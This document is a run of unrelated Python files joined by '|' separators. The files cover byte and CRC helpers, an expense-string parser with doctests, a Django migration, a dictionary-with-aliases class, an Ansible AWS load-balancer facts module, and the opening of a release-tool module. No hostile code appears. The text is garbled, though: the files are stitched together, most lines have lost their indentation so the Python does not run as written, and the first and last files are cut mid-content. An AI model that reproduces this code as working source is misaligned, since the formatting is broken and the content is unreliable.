0x0089, 0x008B, 0x0095, 0x0097, 0x009D, 0x00A3, 0x00A7, 0x00AD,
0x00B3, 0x00B5, 0x00BF, 0x00C1, 0x00C5, 0x00C7, 0x00D3, 0x00DF,
0x00E3, 0x00E5, 0x00E9, 0x00EF, 0x00F1, 0x00FB, 0x0101, 0x0107,
0x010D, 0x010F, 0x0115, 0x0119, 0x011B, 0x0125, 0x0133, 0x0137,
0x0139, 0x013D, 0x014B, 0x0151, 0x015B, 0x015D, 0x0161, 0x0167,
0x016F, 0x0175, 0x017B, 0x017F, 0x0185, 0x018D, 0x0191, 0x0199,
0x01A3, 0x01A5, 0x01AF, 0x01B1, 0x01B7, 0x01BB, 0x01C1, 0x01C9,
0x01CD, 0x01CF, 0x01D3, 0x01DF, 0x01E7, 0x01EB, 0x01F3, 0x01F7,
0x01FD, 0x0209, 0x020B, 0x021D, 0x0223, 0x022D, 0x0233, 0x0239,
0x023B, 0x0241, 0x024B, 0x0251, 0x0257, 0x0259, 0x025F, 0x0265,
0x0269, 0x026B, 0x0277, 0x0281, 0x0283, 0x0287, 0x028D, 0x0293,
0x0295, 0x02A1, 0x02A5, 0x02AB, 0x02B3, 0x02BD, 0x02C5, 0x02CF,
0x02D7, 0x02DD, 0x02E3, 0x02E7, 0x02EF, 0x02F5, 0x02F9, 0x0301,
0x0305, 0x0313, 0x031D, 0x0329, 0x032B, 0x0335, 0x0337, 0x033B,
0x033D, 0x0347, 0x0355, 0x0359, 0x035B, 0x035F, 0x036D, 0x0371,
0x0373, 0x0377, 0x038B, 0x038F, 0x0397, 0x03A1, 0x03A9, 0x03AD,
0x03B3, 0x03B9, 0x03C7, 0x03CB, 0x03D1, 0x03D7, 0x03DF, 0x03E5,
0x03F1, 0x03F5, 0x03FB, 0x03FD, 0x0407, 0x0409, 0x040F, 0x0419,
0x041B, 0x0425, 0x0427, 0x042D, 0x043F, 0x0443, 0x0445, 0x0449,
0x044F, 0x0455, 0x045D, 0x0463, 0x0469, 0x047F, 0x0481, 0x048B,
0x0493, 0x049D, 0x04A3, 0x04A9, 0x04B1, 0x04BD, 0x04C1, 0x04C7,
0x04CD, 0x04CF, 0x04D5, 0x04E1, 0x04EB, 0x04FD, 0x04FF, 0x0503,
0x0509, 0x050B, 0x0511, 0x0515, 0x0517, 0x051B, 0x0527, 0x0529,
0x052F, 0x0551, 0x0557, 0x055D, 0x0565, 0x0577, 0x0581, 0x058F,
0x0593, 0x0595, 0x0599, 0x059F, 0x05A7, 0x05AB, 0x05AD, 0x05B3,
0x05BF, 0x05C9, 0x05CB, 0x05CF, 0x05D1, 0x05D5, 0x05DB, 0x05E7,
0x05F3, 0x05FB, 0x0607, 0x060D, 0x0611, 0x0617, 0x061F, 0x0623,
0x062B, 0x062F, 0x063D, 0x0641, 0x0647, 0x0649, 0x064D, 0x0653
)
################################################################################
def bytes2list(data):
return [ord(c) for c in data]
def list2bytes(byte_list):
return ''.join([chr(x) for x in byte_list])
def bytes2int(data):
'''
'\x12\x34\x56\x78' => 0x12345678
'''
v = 0
for c in data:
v <<= 8
v |= ord(c)
return v
def int2bytes(n, length = -1):
'''
0x12345678 => '\x12\x34\x56\x78'
'''
datas = []
while n:
datas.append(chr(n & 0xFF))
n >>= 8
datas.reverse()
data = ''.join(datas)
data_len = len(data)
if length > data_len:
data = '\x00' * (length - data_len) + data
return data
def left_shift_1bit(data):
datas = []
length = len(data)
msb = 0
for i in range(length - 1, -1, -1):
d = ord(data[i])
d = (d << 1) | msb
msb = (d >> 8)
d &= 0xFF
datas.append(chr(d))
datas.reverse()
return ''.join(datas)
def get_ber_bytes(length):
data = ''
if length < 128:
data = chr(length)
elif length < 256:
data = '\x81' + chr(length)
elif length < 65536:
data = '\x82' + chr((length>>8)&0xFF) + chr(length&0xFF)
else:
data = '\x83' + chr((length >> 16)&0xFF) + chr((length>>8)&0xFF) + chr(length&0xFF)
return data
def get_ber_length(bytes):
i = 0
#L
L = ord(bytes[i])
i += 1
l_length = 1
if (L == 0x81):
L = ord(bytes[i])
i += 1
l_length += 1
assert((L >= 128) and (L <= 255))
elif (L == 0x82):
L = (ord(bytes[i]) << 8) | ord(bytes[i+1])
i += 2
l_length += 2
assert((L >= 256) and (L <= 65535))
elif (L == 0x83):
L = (ord(bytes[i]) << 16) | (ord(bytes[i+1]) << 8) | ord(bytes[i+2])
i += 3
l_length += 3
assert(L >= 65536)
else:
assert(L <= 127)
return (l_length, L, bytes[i:])
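def _ber_self_test():
    # Worked examples for the BER helpers above (an illustrative self-check added
    # for documentation, not part of the original module; values checked by hand):
    assert get_ber_bytes(5) == '\x05'
    assert get_ber_bytes(300) == '\x82\x01\x2c'
    assert get_ber_length('\x82\x01\x2c' + 'payload') == (3, 300, 'payload')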
################################################################################
def is_small_prime(n):
flag = True
if n < 2:
return False
k = 2
while (k * k) <= n:
if n % k == 0:
flag = False
break
k += 1
return flag
################################################################################
def random_bytes(length):
datas = []
for i in range(length):
datas.append(chr(random.randint(0x00, 0xFF)))
return ''.join(datas)
def random_nozero_bytes(length):
datas = []
i = 0
while True:
if i == length:
break
v = random_bytes(1)
if v == '\x00':
continue
else:
datas.append(v)
i += 1
return ''.join(datas)
################################################################################
def zero_pad(data, length):
len1 = len(data)
if length > len1:
data = '\x00' * (length - len1) + data
return data
def xor(A, B):
assert(len(A) == len(B))
return ''.join([chr(ord(A[i]) ^ ord(B[i])) for i in range(len(A))])
def checksum(bytes):
r = 0
for c in bytes:
r ^= ord(c)
return chr(r)
def compute_crc(data, init_value = 0x6363):
wCrc = init_value
for c in data:
ch = (ord(c) ^ (wCrc & 0x00ff)) & 0x00ff
ch = (ch ^ (ch << 4)) & 0x00ff
wCrc = ((wCrc >> 8) & 0x00ff) ^ (ch << 8) ^ (ch << 3) ^ (ch >> 4)
ret1 = chr(wCrc & 0x00ff)
ret2 = chr((wCrc >> 8) & 0x00ff)
return ret1 + ret2
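# Editor-added note (illustrative): compute_crc() with the default 0x6363 preset
# appears to implement the CRC_A variant used by ISO/IEC 14443-style frames and
# returns the two CRC bytes low byte first, so a framed message is data + CRC:
def _frame_with_crc(data):
    return data + compute_crc(data)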
################################################################################
def main():
'''
v = int("12345678" * 1000)
print hex(v)
bytes = int2bytes(v, 0x08)
print s(bytes)
v = bytes2int(bytes)
print hex(v)
'''
a1 = "1122334455 66 77"
a2 = b(a1)
a3 = s(a2, ', ', '(byte)0x')
print a1
print a3
if __name__ == '__main__':
main()
|
from gpiozero import FishDish
from signal import pause
fish = FishDish()
fish.button.when_pressed = fish.on
fish.button.when_released = fish.off
pause()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import date, timedelta
import extract, fmt
def _prepstr(s):
"""
>>> _prepstr(s='')
''
>>> _prepstr(s='$')
'$'
>>> _prepstr(s=' ')
''
>>> _prepstr(s='hello world')
'hello world'
>>> _prepstr(s='hello world')
'hello world'
>>> _prepstr(s='Hello World')
'hello world'
>>> _prepstr(s='HELLO WORLD')
'hello world'
"""
return fmt.compress_whitespace(s.lower())
def dollar_amount(s):
#
# Find the amount
"""
>>> dollar_amount('19.99')
(19.99, '')
>>> dollar_amount('-19.99')
(-19.99, '')
>>> dollar_amount('+19.99')
(19.99, '')
>>> dollar_amount('$19.99')
(19.99, '')
>>> dollar_amount('19.99 for coffee')
(19.99, 'for coffee')
>>> dollar_amount('$19.99 for coffee')
(19.99, 'for coffee')
>>> dollar_amount('coffee 19.99')
(19.99, 'coffee')
>>> dollar_amount('coffee $19.99')
(19.99, 'coffee')
>>> dollar_amount('$19.99 for coffee at 4.20 bar')
(19.99, 'for coffee at 4.20 bar')
>>> dollar_amount('4.20 $19.99 wine')
(19.99, '4.20 wine')
>>> dollar_amount('sold 1,900.99 comics')
(1900.99, 'sold comics')
>>> dollar_amount('bought $12,345,900.99 comics')
(12345900.99, 'bought comics')
>>> dollar_amount('hi there kitty kat')
(None, 'hi there kitty kat')
>>> dollar_amount('19.12345000001')
(19.12, '')
>>> dollar_amount('19.129')
(19.12, '')
"""
s = _prepstr(s)
amt = None
matched_amt = ''
# First, split up the string and hunt for price-like things
bits = s.split(' ')
for chunk in bits:
        if chunk.startswith('$') and len(chunk) > 1:
# Then we probably have it
str_amt = extract.price_like(chunk)
try:
amt = float(str_amt)
except (TypeError, ValueError):
pass
else:
if amt:
matched_amt = chunk
break
if not amt:
# Keep looking
for chunk in bits:
str_amt = extract.price_like(chunk)
try:
amt = float(str_amt)
except (TypeError, ValueError):
pass
else:
if amt:
matched_amt = chunk
break
# If we found something, remove it from the string
if amt and matched_amt:
s = s.replace(matched_amt, '', 1)
s = _prepstr(s.replace('$', ''))
return amt, s
def calendar_date(s):
"""
>>> calendar_date('4/20/14')
(datetime.date(2014, 4, 20), '')
>>> calendar_date('4/20/2014')
(datetime.date(2014, 4, 20), '')
>>> calendar_date('4-20-14')
(datetime.date(2014, 4, 20), '')
>>> calendar_date('4-20-2014')
(datetime.date(2014, 4, 20), '')
>>> result = calendar_date('coffee on 4/20')
>>> result == (date(date.today().year, 4, 20), 'coffee on')
True
>>> result = calendar_date('3.53 for coffee on 4/20')
>>> result == (date(date.today().year, 4, 20), '3.53 for coffee on')
True
>>> result = calendar_date('3.53 for coffee on 4.20')
>>> result == (date(date.today().year, 4, 20), '3.53 for coffee on')
True
>>> today = date.today()
>>> res = calendar_date('today')
>>> res == (today, '')
True
>>> res = calendar_date('tomorrow')
>>> res == (today + timedelta(days=1), '')
True
>>> res = calendar_date('coffee tomorrow')
>>> res == (today + timedelta(days=1), 'coffee')
True
>>> calendar_date('foobar')
(None, 'foobar')
"""
def _sub_dayofweek(dow, num, s):
d = today - timedelta(days=today.isoweekday() - num)
if d > today:
d = d - timedelta(days=7)
s = s.replace(dow, '', 1)
return d, s
s = _prepstr(s)
#
# Find the date. Default to 'today' if not resolved
today = date.today()
d = None
if s.find('today') >= 0:
d = today
s = s.replace('today', '', 1)
elif s.find('tomorrow') >= 0:
d = today + timedelta(days=1)
s = s.replace('tomorrow', '', 1)
elif s.find('yesterday') >= 0:
d = today - timedelta(days=1)
s = s.replace('yesterday', '', 1)
elif s.find('monday') >= 0:
d, s = _sub_dayofweek('monday', 1, s)
elif s.find('tuesday') >= 0:
d, s = _sub_dayofweek('tuesday', 2, s)
elif s.find('wednesday') >= 0:
d, s = _sub_dayofweek('wednesday', 3, s)
elif s.find('thursday') >= 0:
d, s = _sub_dayofweek('thursday', 4, s)
elif s.find('friday') >= 0:
d, s = _sub_dayofweek('friday', 5, s)
elif s.find('saturday') >= 0:
d, s = _sub_dayofweek('saturday', 6, s)
elif s.find('sunday') >= 0:
d, s = _sub_dayofweek('sunday', 7, s)
else:
# Split up the patterns so we don't have to test ALL of them if some don't seem likely to match
slash_patterns = ["%m/%d", "%m/%d/%y", "%m/%d/%Y", "%Y/%m/%d"]
dash_patterns = ["%m-%d-%y", "%m-%d-%Y", "%Y-%m-%d"]
dot_patterns = ["%m.%d"]
use_patterns = []
if s.find('/') >= 0:
use_patterns.extend(slash_patterns)
if s.find('-') >= 0:
use_patterns.extend(dash_patterns)
if s.find('.') >= 0:
use_patterns.extend(dot_patterns)
# Tokenize and scan for date-like strings
for pat in use_patterns:
# If the next bit finds something, `d` will be a datetime object, and
# `matched_str` will be the string that the code thinks is the date.
# Everything else will be removed. (Unless a date isn't found at all
# in the string, in which case `d` will be None and `matched_str` will
            # be whatever we passed in.)
d, matched_str = extract.date_by_pattern(s, pattern=pat, return_match_str=True)
if d is not None:
# If we found a date, remove that part of the string from the source string,
# but only once.
s = s.replace(matched_str, '', 1)
break
s = _prepstr(s)
return d, s
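# Editor-added illustration: the two parsers above are designed to be chained; the
# expected values below follow the doctests and assume the external `extract` module
# behaves as those doctests describe (this helper is hypothetical, not project code).
def _parse_expense_example():
    amount, rest = dollar_amount('$19.99 for coffee on 4/20/2014')
    day, note = calendar_date(rest)
    assert amount == 19.99
    assert day == date(2014, 4, 20)
    assert note == 'for coffee on'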
# --
if __name__ == "__main__":
import sys
import getopt
try:
opts, args = getopt.getopt(sys.argv[1:], '', ['test', 'unittest', 'doctest'])
except getopt.GetoptError as err:
print(str(err))
sys.exit(2)
run_doc_tests = False
run_unit_tests = False
run_all_tests = False
for o, a in opts:
if o in ["--test"]:
run_all_tests = True
if o in ["--doctest"]:
run_doc_tests = True
if o in ["--unittest"]:
run_unit_tests = True
def _run_doctests():
import doctest
print("[find.py] Running doctest...")
doctest.testmod()
print("Done.")
    if run_all_tests or run_doc_tests:
        _run_doctests()
sys.exit(2)
|
# Generated by Django 2.0.1 on 2018-03-06 23:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('classy', '0027_auto_20180306_1517'),
]
operations = [
migrations.AddField(
model_name='classification_review',
name='group_id',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='classy.classification_review_groups'),
),
]
|
import yaml
def get_data_from_yaml(file_path):
with open(file_path) as f:
        data = yaml.load(f, Loader=yaml.FullLoader)
    return data
|
r = float(input("How much money do you have in your wallet? R$"))
d = r / 3.27  # fixed BRL -> USD exchange rate used by this script
print("With R${:.2f} you can buy US${:.2f}".format(r, d)) |
"""
Copyright 2019 Samsung SDS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import pandas as pd
from brightics.common.utils import check_required_parameters
from brightics.common.utils import get_default_from_parameters_if_required
from brightics.common.validation import validate
from brightics.common.validation import greater_than
from brightics.common.validation import greater_than_or_equal_to
from brightics.common.classify_input_type import check_col_type
def replace_string(table, **params):
check_required_parameters(_replace_string, params, ['table'])
return _replace_string(table, **params)
def _replace_string(table, input_cols, replace_mode='part', empty_as_null=False, target_string_null=True, target_string=None, replace_string_null=True, replace_string=None):
out_table = table.copy()
for input_col in input_cols:
if replace_mode == 'part':
if target_string and replace_string:
out_table[input_col] = [(x.replace(target_string, replace_string) if not pd.isnull(x) else x) for x in table[input_col]]
else:
if target_string_null and not replace_string_null:
out_table[input_col] = np.where(pd.isnull(table[input_col]), replace_string, table[input_col])
if empty_as_null:
out_table[input_col] = np.where(out_table[input_col] == '', replace_string, out_table[input_col])
elif not target_string_null and replace_string_null:
out_table[input_col] = np.where(table[input_col] == target_string, None, table[input_col])
elif not target_string_null and not replace_string_null:
out_table[input_col] = np.where(table[input_col] == target_string, replace_string, table[input_col])
return {'out_table' : out_table} |
from collections.abc import MutableMapping
from typing import List, Hashable
from mmdict.errors import AliasExistsError
class MultiDict(MutableMapping):
def __init__(self, initial={}, aliases={}):
        # Actual storage of values, by canonical key
        self.value_store = {}
        # Mapping of alias -> canonical key
        self.alias_to_storage = {}
        # Mapping of {canonical key -> Set[alias: Hashable]}
self.storage_to_aliases = {}
# Load any constructor supplied aliases to prepare for
# any constructor-supplied data
for real, alias in aliases.items():
            if not isinstance(alias, list):
alias = [alias]
self.alias(real, alias)
# Load any constructor-supplied data. We simply let the
# `MutableMapping` protocol take the wheel from here
self.update(initial)
def alias(self, canonical: Hashable, aliases: List[Hashable]):
# We do not want to allow an alias to shadow a destination
if self.is_alias(canonical):
raise AliasExistsError(f'Destination {canonical} is already defined as an alias.')
# Ensure that any potential subclass transforms take place
canonical = self._to_storage_key(canonical)
not_found = KeyError("Not Found")
for alias in aliases:
alias_key = self._to_internal_alias(alias)
# Don't bother aliasing identity
if canonical == alias_key:
continue
            # We are not allowed to overwrite an alias with an alias to a different key.
            #
            # This prevents an initialization such as
            # `MultiDict(..., aliases={"one": ["One", 1], "two": ["One", "Two"]})`
            # from silently replacing, or arbitrarily choosing to keep, one definition of
# `"One" -> "one"` or `"One" -> "two"`
#
# We use a sentinel `not_found` to avoid failing on falsey but valid keys.
existing = self.alias_to_storage.get(alias_key, not_found)
if existing not in (canonical, not_found):
existing_external = self._to_external_key(existing)
raise AliasExistsError(f'{alias} is already defined as an alias for {existing_external}')
            # Store forward and backward references for the alias
            self.alias_to_storage[alias_key] = canonical
            aliases_for_canonical = self.storage_to_aliases.setdefault(canonical, set())
            aliases_for_canonical.add(alias_key)
def unalias(self, alias: Hashable) -> bool:
'''
Remove an alias to a canonical key.
        Returns `True` if the alias was removed, `False` if no action was taken.
'''
not_found = KeyError("not found")
alias_key = self._to_internal_alias(alias)
storage_key = self.alias_to_storage.get(alias_key, not_found)
if storage_key == not_found:
return False
del self.alias_to_storage[alias_key]
self.storage_to_aliases[storage_key].remove(alias_key)
return True
def unalias_all(self, key: Hashable):
'''
        Remove any aliases associated with `key`, first by following
        the aliases to the canonical key, then clearing all aliases for
        that canonical key.
'''
storage_key = self._to_storage_key(key)
aliases = self.storage_to_aliases.get(storage_key, set())
for alias in aliases.copy():
self.unalias(alias)
def is_alias(self, key: Hashable) -> bool:
return self._to_internal_alias(key) in self.alias_to_storage
def _to_internal_alias(self, key):
'''
Transforms a supplied alias to an internal alias.
Not used in the base, but allows for easier normalization
of aliases.
'''
return key
def _to_storage_key(self, key):
'''
Transform a supplied key into the key used to store values in
`self.value_store` by resolving aliases.
'''
internal_alias = self._to_internal_alias(key)
return self.alias_to_storage.get(internal_alias, key)
def _to_external_key(self, key):
'''
Transforms a `self.value_store` key into an externally presentable key.
Not actively used here, but tied into `__iter__`, so that subclasses can
differentiate between the storage key and the user supplied key that
produced it.
For example, using downcased storage keys, but preserving case for iteration.
'''
return key
# MutableMapping protocol definitions
def __getitem__(self, key):
value_store_key = self._to_storage_key(key)
try:
return self.value_store[value_store_key]
except KeyError:
# Re-raise the `KeyError` with the passed in key instead
# of the transformed, canonical storage one.
raise KeyError(key)
def __setitem__(self, key, value):
value_store_key = self._to_storage_key(key)
self.value_store[value_store_key] = value
def __delitem__(self, key):
value_store_key = self._to_storage_key(key)
del self.value_store[value_store_key]
def __iter__(self):
return (self._to_external_key(k) for k in self.value_store.keys())
def __len__(self):
return len(self.value_store)
# Pretty-printers and exports
def to_dict(self) -> dict:
'''
Return a regular `dict` of the canonical keys and values
'''
return dict(self.items())
def __repr__(self):
class_name = self.__class__.__name__
data = self.to_dict()
aliases = self.storage_to_aliases
return f'<{class_name}: {data} aliases={aliases}>'
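# Editor-added illustration (a minimal sketch, not part of the library or its tests):
# reads and writes through an alias resolve to the same canonical key.
def _multidict_example():
    d = MultiDict({"one": 1}, aliases={"one": ["uno", "eins"]})
    assert d["uno"] == 1 and d["eins"] == 1  # aliases resolve to "one"
    d["eins"] = 2                            # writing through an alias...
    assert d["one"] == 2                     # ...updates the canonical value
    assert list(d) == ["one"]                # iteration yields canonical keys only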
|
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: elb_application_lb_facts
short_description: Gather facts about application ELBs in AWS
description:
- Gather facts about application ELBs in AWS
version_added: "2.4"
author: Rob White (@wimnat)
options:
load_balancer_arns:
description:
- The Amazon Resource Names (ARN) of the load balancers. You can specify up to 20 load balancers in a single call.
required: false
names:
description:
- The names of the load balancers.
required: false
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Gather facts about all target groups
- elb_application_lb_facts:
# Gather facts about the target group attached to a particular ELB
- elb_application_lb_facts:
load_balancer_arns:
- "arn:aws:elasticloadbalancing:ap-southeast-2:001122334455:loadbalancer/app/my-elb/aabbccddeeff"
# Gather facts about a target groups named 'tg1' and 'tg2'
- elb_application_lb_facts:
names:
- elb1
- elb2
'''
RETURN = '''
load_balancers:
description: a list of load balancers
returned: always
type: complex
contains:
access_logs_s3_bucket:
description: The name of the S3 bucket for the access logs.
returned: when status is present
type: string
sample: mys3bucket
access_logs_s3_enabled:
description: Indicates whether access logs stored in Amazon S3 are enabled.
returned: when status is present
type: string
sample: true
access_logs_s3_prefix:
description: The prefix for the location in the S3 bucket.
returned: when status is present
type: string
sample: /my/logs
availability_zones:
description: The Availability Zones for the load balancer.
returned: when status is present
type: list
sample: "[{'subnet_id': 'subnet-aabbccddff', 'zone_name': 'ap-southeast-2a'}]"
canonical_hosted_zone_id:
description: The ID of the Amazon Route 53 hosted zone associated with the load balancer.
returned: when status is present
type: string
sample: ABCDEF12345678
created_time:
description: The date and time the load balancer was created.
returned: when status is present
type: string
sample: "2015-02-12T02:14:02+00:00"
deletion_protection_enabled:
description: Indicates whether deletion protection is enabled.
returned: when status is present
type: string
sample: true
dns_name:
description: The public DNS name of the load balancer.
returned: when status is present
type: string
sample: internal-my-elb-123456789.ap-southeast-2.elb.amazonaws.com
idle_timeout_timeout_seconds:
description: The idle timeout value, in seconds.
returned: when status is present
type: string
sample: 60
ip_address_type:
description: The type of IP addresses used by the subnets for the load balancer.
returned: when status is present
type: string
sample: ipv4
load_balancer_arn:
description: The Amazon Resource Name (ARN) of the load balancer.
returned: when status is present
type: string
sample: arn:aws:elasticloadbalancing:ap-southeast-2:0123456789:loadbalancer/app/my-elb/001122334455
load_balancer_name:
description: The name of the load balancer.
returned: when status is present
type: string
sample: my-elb
scheme:
description: Internet-facing or internal load balancer.
returned: when status is present
type: string
sample: internal
security_groups:
description: The IDs of the security groups for the load balancer.
returned: when status is present
type: list
sample: ['sg-0011223344']
state:
description: The state of the load balancer.
returned: when status is present
type: dict
sample: "{'code': 'active'}"
tags:
description: The tags attached to the load balancer.
returned: when status is present
type: dict
sample: "{
'Tag': 'Example'
}"
type:
description: The type of load balancer.
returned: when status is present
type: string
sample: application
vpc_id:
description: The ID of the VPC for the load balancer.
returned: when status is present
type: string
sample: vpc-0011223344
'''
import traceback
try:
import boto3
from botocore.exceptions import ClientError, NoCredentialsError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (boto3_conn, boto3_tag_list_to_ansible_dict, camel_dict_to_snake_dict,
ec2_argument_spec, get_aws_connection_info)
def get_elb_listeners(connection, module, elb_arn):
try:
return connection.describe_listeners(LoadBalancerArn=elb_arn)['Listeners']
except ClientError as e:
module.fail_json(msg=e.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(e.response))
def get_listener_rules(connection, module, listener_arn):
try:
return connection.describe_rules(ListenerArn=listener_arn)['Rules']
except ClientError as e:
module.fail_json(msg=e.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(e.response))
def get_load_balancer_attributes(connection, module, load_balancer_arn):
try:
load_balancer_attributes = boto3_tag_list_to_ansible_dict(connection.describe_load_balancer_attributes(LoadBalancerArn=load_balancer_arn)['Attributes'])
except ClientError as e:
module.fail_json(msg=e.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(e.response))
# Replace '.' with '_' in attribute key names to make it more Ansibley
for k, v in list(load_balancer_attributes.items()):
load_balancer_attributes[k.replace('.', '_')] = v
del load_balancer_attributes[k]
return load_balancer_attributes
def get_load_balancer_tags(connection, module, load_balancer_arn):
try:
return boto3_tag_list_to_ansible_dict(connection.describe_tags(ResourceArns=[load_balancer_arn])['TagDescriptions'][0]['Tags'])
except ClientError as e:
module.fail_json(msg=e.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(e.response))
def list_load_balancers(connection, module):
load_balancer_arns = module.params.get("load_balancer_arns")
names = module.params.get("names")
try:
load_balancer_paginator = connection.get_paginator('describe_load_balancers')
if not load_balancer_arns and not names:
load_balancers = load_balancer_paginator.paginate().build_full_result()
if load_balancer_arns:
load_balancers = load_balancer_paginator.paginate(LoadBalancerArns=load_balancer_arns).build_full_result()
if names:
load_balancers = load_balancer_paginator.paginate(Names=names).build_full_result()
except ClientError as e:
if e.response['Error']['Code'] == 'LoadBalancerNotFound':
module.exit_json(load_balancers=[])
else:
module.fail_json(msg=e.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(e.response))
except NoCredentialsError as e:
module.fail_json(msg="AWS authentication problem. " + e.message, exception=traceback.format_exc())
for load_balancer in load_balancers['LoadBalancers']:
# Get the attributes for each elb
load_balancer.update(get_load_balancer_attributes(connection, module, load_balancer['LoadBalancerArn']))
# Get the listeners for each elb
load_balancer['listeners'] = get_elb_listeners(connection, module, load_balancer['LoadBalancerArn'])
# For each listener, get listener rules
for listener in load_balancer['listeners']:
listener['rules'] = get_listener_rules(connection, module, listener['ListenerArn'])
# Turn the boto3 result in to ansible_friendly_snaked_names
snaked_load_balancers = [camel_dict_to_snake_dict(load_balancer) for load_balancer in load_balancers['LoadBalancers']]
# Get tags for each load balancer
for snaked_load_balancer in snaked_load_balancers:
snaked_load_balancer['tags'] = get_load_balancer_tags(connection, module, snaked_load_balancer['load_balancer_arn'])
module.exit_json(load_balancers=snaked_load_balancers)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
load_balancer_arns=dict(type='list'),
names=dict(type='list')
)
)
module = AnsibleModule(argument_spec=argument_spec,
                           mutually_exclusive=[['load_balancer_arns', 'names']],
supports_check_mode=True
)
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
if region:
connection = boto3_conn(module, conn_type='client', resource='elbv2', region=region, endpoint=ec2_url, **aws_connect_params)
else:
module.fail_json(msg="region must be specified")
list_load_balancers(connection, module)
if __name__ == '__main__':
main()
|
## Brian Blaylock
## October 18, 2021
"""
Some simple tests for the ABI data
"""
from goes2go.data import goes_nearesttime, goes_latest, goes_timerange
def test_nearesttime():
ds = goes_nearesttime('2020-01-01', save_dir='$TMPDIR')
def test_latest():
ds = goes_latest(save_dir='$TMPDIR')
|
#!/usr/bin/env python3
# coding=utf-8
"""
Mreleaser __init__.py Module
"""
from __future__ import annotations
__all__ = (
"AnyPath",
"ExcType",
"TemporaryFileType",
"CmdError",
"Env",
"Git",
"Path",
"Releaser",
"TempDir",
"aiocmd",
"cli_invoke",
"cmd",
"suppress",
"version",
)
import asyncio
import contextlib
import ipaddress
import importlib.metadata
import os
import pathlib
import subprocess
import tempfile
import urllib.parse
from dataclasses import dataclass
from dataclasses import field
from dataclasses import InitVar
from ipaddress import IPv4Address
from ipaddress import IPv6Address
from os import PathLike
from subprocess import CompletedProcess
from typing import Any
from typing import AnyStr
from typing import Callable
from typing import ClassVar
from typing import IO
from typing import Literal
from typing import Optional
from typing import ParamSpec
from typing import Type
from typing import TypeAlias
from typing import TypeVar
from typing import Union
from urllib.parse import ParseResult
import git
from git import Git as GitCmd
from git import GitCmdObjectDB
from gitdb import LooseObjectDB
from ppath import Path
from setuptools.config import read_configuration
from typer import Argument
from typer import Typer
from typer.testing import CliRunner
P = ParamSpec('P')
T = TypeVar('T')
GitType: TypeAlias = 'Git'
PathType: TypeAlias = 'Path'
__project__: str = pathlib.Path(__file__).parent.name
app = Typer(add_completion=False, context_settings=dict(help_option_names=['-h', '--help']), name=__project__)
AnyPath: TypeAlias = Union[PathType, PathLike, AnyStr, IO[AnyStr]]
ExcType: TypeAlias = Type[Exception] | tuple[Type[Exception], ...]
class TemporaryFileType(type(tempfile.NamedTemporaryFile())): file: PathType = None
class CmdError(subprocess.CalledProcessError):
"""
Raised when run() and the process returns a non-zero exit status.
Attributes:
process: The CompletedProcess object returned by run().
"""
def __init__(self, process: CompletedProcess = None):
super().__init__(process.returncode, process.args, output=process.stdout, stderr=process.stderr)
def __str__(self):
value = super().__str__()
if self.stderr is not None:
value += "\n" + self.stderr
if self.stdout is not None:
value += "\n" + self.stdout
return value
@dataclass
class Env:
# noinspection LongLine
"""
GitHub Actions Variables Class
See Also: `Environment variables
<https://docs.github.com/en/enterprise-cloud@latest/actions/learn-github-actions/environment-variables>`_
If you need to use a workflow run's URL from within a job, you can combine these environment variables:
``$GITHUB_SERVER_URL/$GITHUB_REPOSITORY/actions/runs/$GITHUB_RUN_ID``
If you generate a value in one step of a job, you can use the value in subsequent ``steps`` of
the same job by assigning the value to an existing or new environment variable and then writing
this to the ``GITHUB_ENV`` environment file, see `Commands
<https://docs.github.com/en/enterprise-cloud@latest/actions/reference/workflow-commands-for-github-actions/#setting-an-environment-variable>`_.
If you want to pass a value from a step in one job in a ``workflow`` to a step in another job in the workflow,
you can define the value as a job output, see `Syntax
<https://docs.github.com/en/enterprise-cloud@latest/actions/learn-github-actions/workflow-syntax-for-github-actions#jobsjob_idoutputs>`_.
"""
CI: bool | str | None = field(default=None, init=False)
"""Always set to ``true`` in a GitHub Actions environment."""
GITHUB_ACTION: str | None = field(default=None, init=False)
# noinspection LongLine
"""
The name of the action currently running, or the `id
<https://docs.github.com/en/enterprise-cloud@latest/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsid>`_ of a step.
For example, for an action, ``__repo-owner_name-of-action-repo``.
GitHub removes special characters, and uses the name ``__run`` when the current step runs a script without an id.
If you use the same script or action more than once in the same job,
the name will include a suffix that consists of the sequence number preceded by an underscore.
For example, the first script you run will have the name ``__run``, and the second script will be named ``__run_2``.
Similarly, the second invocation of ``actions/checkout`` will be ``actionscheckout2``.
"""
GITHUB_ACTION_PATH: Path | str | None = field(default=None, init=False)
"""
The path where an action is located. This property is only supported in composite actions.
You can use this path to access files located in the same repository as the action.
For example, ``/home/runner/work/_actions/repo-owner/name-of-action-repo/v1``.
"""
GITHUB_ACTION_REPOSITORY: str | None = field(default=None, init=False)
"""
For a step executing an action, this is the owner and repository name of the action.
For example, ``actions/checkout``.
"""
